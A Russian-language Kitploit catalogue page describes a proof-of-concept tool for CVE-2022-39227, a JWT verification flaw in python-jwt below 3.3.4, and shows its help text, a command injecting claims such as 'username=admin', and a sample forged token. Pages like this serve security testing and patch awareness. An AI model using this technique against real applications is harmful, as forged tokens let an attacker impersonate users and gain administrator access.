Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-39227 — CVE-2022-39227 : Proof of Concept | Kitploit
Инструменты/GitHubGitHub/user0x1337/cve-2022-39227
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияВеб-безопасностьCTFАутентификация
GitHubuser0x1337/cve-2022-39227

CVE-2022-39227

CVE-2022-39227 : Proof of Concept

Репозиторий
221122 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-39227

CVE-2022-39227 : Доказательство концепции

Доказательство концепции для CVE-2022-39227. Согласно этой CVE, существует ошибка в проверке JSON Web Token. Имея валидный токен, можно повторно использовать его подпись с изменёнными утверждениями.

Необходимо:

  1. Валидный JSON Web Token.
  2. Бэкенд должен использовать библиотеку Python "python-jwt" версии < 3.3.4

Для удобства я написал простой PoC во время CTF:

usage: CVE-2022-39227-PoC [-h] -j TOKEN -i CLAIM

Proof of Concept for the JWT verification bug in python-jwt version < 3.3.4

options:
  -h, --help            show this help message and exit
  -j TOKEN, --jwt_token TOKEN
                        Original and valid JWT Token returned by the application
  -i CLAIM, --injected_claim CLAIM
                        Inject claim using the form "key=value", e.g. "username=admin". Use "," for more claims
                        (e.g. username=admin,id=3)

Использование:

python3 cve_2022_39227.py -j <JWT-WEBTOKEN> -i "<KEY>=<VALUE>"

Возвращает:

{"  <SNIP>":"","protected":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"<SNIP>","signature":"18-caQyY-mnreIUb53kk5qI-axRoxSzQKyT033yOdUw"}

Возвращаемое значение представляет собой смешанную форму JSON и компактного представления. Вам нужно вставить всё значение, включая "{" и "}", в качестве нового JWT токена.

Скачать инструмент